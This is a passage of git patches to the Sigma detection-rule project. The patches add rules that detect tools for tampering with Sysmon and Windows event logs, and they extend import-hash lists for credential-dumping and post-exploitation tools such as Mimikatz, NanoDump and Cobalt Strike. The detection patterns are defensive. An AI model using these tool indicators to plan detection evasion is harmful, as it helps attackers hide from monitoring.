'C:\avast! sandbox' - Image|contains: '\SystemRoot\System32\' - Image: 'C:\Windows\explorer.exe' condition: selection and not filter From 6ad167a4f31e2aeeccf2ef753551f7cbbbf031ac Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 7 Sep 2022 14:33:44 +0200 Subject: [PATCH 29/73] rule: SysmonEnte usage --- .../proc_access_win_hack_sysmonente.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/process_access/proc_access_win_hack_sysmonente.yml diff --git a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml new file mode 100644 index 000000000..a1f838075 --- /dev/null +++ b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml @@ -0,0 +1,27 @@ +title: SysmonEnte Usage +id: d29ada0f-af45-4f27-8f32-f7b77c3dbc4e +status: experimental +description: Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon +author: Florian Roth +references: + - https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html + - https://github.com/codewhitesec/SysmonEnte/ + - https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png +date: 2022/09/07 +logsource: + category: process_access + product: windows +detection: + selection_1: + TargetImage: 'C:\Windows\Sysmon64.exe' + GrantedAccess: '0x1400' + filter_1: + SourceImage|startswith: + - 'C:\Program Files' + - 'C:\Windows\System32\' + selection_calltrace: + CallTrace: 'Ente' + condition: ( selection_1 and not filter_1 ) or selection_calltrace +falsepositives: + - Unknown +level: high From 6f1ff59027113d6f06b2d092aed0a4f15dc18911 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 7 Sep 2022 15:29:09 +0200 Subject: [PATCH 30/73] SysmonEnte Hashes --- .../create_stream_hash/create_stream_hash_hacktool_download.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml index abf998846..5a7d6dcd5 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml @@ -78,6 +78,7 @@ detection: - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader - 11083e75553baae21dc89ce8f9a195e4 # DripLoader - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte - Hashes|contains: # Sysmon field hashes contains all types - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam @@ -144,6 +145,7 @@ detection: - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte condition: selection fields: - TargetFilename From b293a7a1811771cabd079bd5ceb5b0073d1d4f04 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 7 Sep 2022 16:01:05 +0200 Subject: [PATCH 31/73] refactor: SysmonEnte, SharpEvtMute, SysmonQuiet --- .../create_stream_hash_hacktool_download.yml | 4 ++++ ...image_load_sysmon_disable_sharpevtmute.yml | 22 +++++++++++++++++++ .../proc_access_win_hack_sysmonente.yml | 3 +++ 3 files changed, 29 insertions(+) create mode 100644 rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml diff --git a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml index 5a7d6dcd5..1d31bc1ea 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml @@ -79,6 +79,8 @@ detection: - 11083e75553baae21dc89ce8f9a195e4 # DripLoader - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook - Hashes|contains: # Sysmon field hashes contains all types - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam @@ -146,6 +148,8 @@ detection: - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook condition: selection fields: - TargetFilename diff --git a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml new file mode 100644 index 000000000..8c3617ae1 --- /dev/null +++ b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml @@ -0,0 +1,22 @@ +title: SharpEvtMute EvtMuteHook Load +id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c +status: experimental +description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs +references: + - https://github.com/bats3c/EvtMute +tags: + - attack.defense_evasion + - attack.t1562.002 +author: Florian Roth +date: 2022/09/07 +logsource: + category: image_load + product: windows +detection: + selection: + - Hashes|contains: 'IMPHASH=330768A4F172E10ACB6287B87289D83B' + - Imphash: '330768a4f172e10acb6287b87289d83b' + condition: selection +falsepositives: + - Other DLLs with that import hash +level: high diff --git a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml index a1f838075..e999257ec 100644 --- a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml +++ b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml @@ -8,6 +8,9 @@ references: - https://github.com/codewhitesec/SysmonEnte/ - https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png date: 2022/09/07 +tags: + - attack.defense_evasion + - attack.t1562.002 logsource: category: process_access product: windows From 2ac92283e61f1e8e4324184796b1b0060cfc7d11 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 7 Sep 2022 16:05:48 +0200 Subject: [PATCH 32/73] indentation and new hashes --- .../create_stream_hash_hacktool_download.yml | 347 +++++++++-------- .../proc_creation_win_hacktool_imphashes.yml | 358 +++++++++--------- 2 files changed, 374 insertions(+), 331 deletions(-) diff --git a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml index 1d31bc1ea..d3d23db50 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml @@ -4,160 +4,197 @@ status: experimental description: Detects the creation of a file on disk that has an imphash of a well-known hack tool author: Florian Roth references: - - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 date: 2022/08/24 -logsource: - product: windows - category: create_stream_hash - definition: 'Requirements: Sysmon config with Imphash logging activated' -detection: - selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam - - 3a19059bd7688cb88e70005f18efc439 # PetitPotam - - bf6223a49e45d99094406777eb6004ba # PetitPotam - - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz - - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz - - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz - - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz - - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz - - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz - - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz - - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz - - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz - - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz - - 9da6d5d77be11712527dcab86df449a3 # Mimikatz - - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz - - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz - - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz - - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz - - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato - - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato - - 6118619783fc175bc7ebecff0769b46e # RoguePotato - - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato - - 563233bfa169acc7892451f71ad5850a # RoguePotato - - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato - - 13f08707f759af6003837a150a371ba1 # Pwdump - - 1781f06048a7e58b323f0b9259be798b # Pwdump - - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump - - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump - - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump - - 713c29b396b907ed71a72482759ed757 # Pwdump - - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump - - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump - - 8b114550386e31895dfab371e741123d # Pwdump - - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX - - 9d68781980370e00e0bd939ee5e6c141 # Pwdump - - b18a1401ff8f444056d29450fbc0a6ce # Pwdump - - cb567f9498452721d77a451374955f5f # Pwdump - - 730073214094cd328547bf1f72289752 # Htran - - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons - - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons - - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons - - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons - - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump - - 0588081ab0e63ba785938467e1b10cca # PPLDump - - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump - - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump - - 4da924cf622d039d58bce71cdf05d242 # NanoDump - - e7a3a5c377e2d29324093377d7db1c66 # NanoDump - - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump - - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump - - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump - - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump - - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump - - e6f9d5152da699934b30daab206471f6 # NanoDump - - 3ad59991ccf1d67339b319b15a41b35d # NanoDump - - ffdd59e0318b85a3e480874d9796d872 # NanoDump - - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump - - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump - - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz - - 0e2216679ca6e1094d63322e3412d650 # HandleKatz - - ada161bf41b8e5e9132858cb54cab5fb # DripLoader - - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader - - 11083e75553baae21dc89ce8f9a195e4 # DripLoader - - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader - - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte - - 19584675d94829987952432e018d5056 # SysmonQuiet - - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook - - Hashes|contains: # Sysmon field hashes contains all types - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam - - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam - - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz - - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz - - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz - - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz - - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz - - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz - - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz - - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz - - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz - - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz - - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz - - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz - - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz - - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz - - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato - - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato - - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato - - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump - - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump - - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump - - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump - - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump - - IMPHASH=730073214094CD328547BF1F72289752 # Htran - - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons - - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump - - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz - - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader - - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte - - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet - - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook - condition: selection -fields: - - TargetFilename - - Image -falsepositives: - - Unknown -level: high +modified: 2022/09/07 tags: - - attack.defense_evasion - - attack.s0139 - - attack.t1564.004 + - attack.defense_evasion + - attack.s0139 + - attack.t1564.004 +logsource: + product: windows + category: create_stream_hash +definition: 'Requirements: Sysmon config with Imphash logging activated' +detection: + selection: + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz + - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz + - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz + - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz + - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz + - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz + - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz + - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz + - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz + - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz + - 9da6d5d77be11712527dcab86df449a3 # Mimikatz + - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz + - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz + - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz + - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz + - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz + - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz + - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz + - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz + - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz + - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz + - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz + - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz + - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz + - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz + - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz + - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz + - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz + - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + condition: selection +fields: + - TargetFilename + - Image +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml b/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml index ea0687c01..dbfc4fd4b 100644 --- 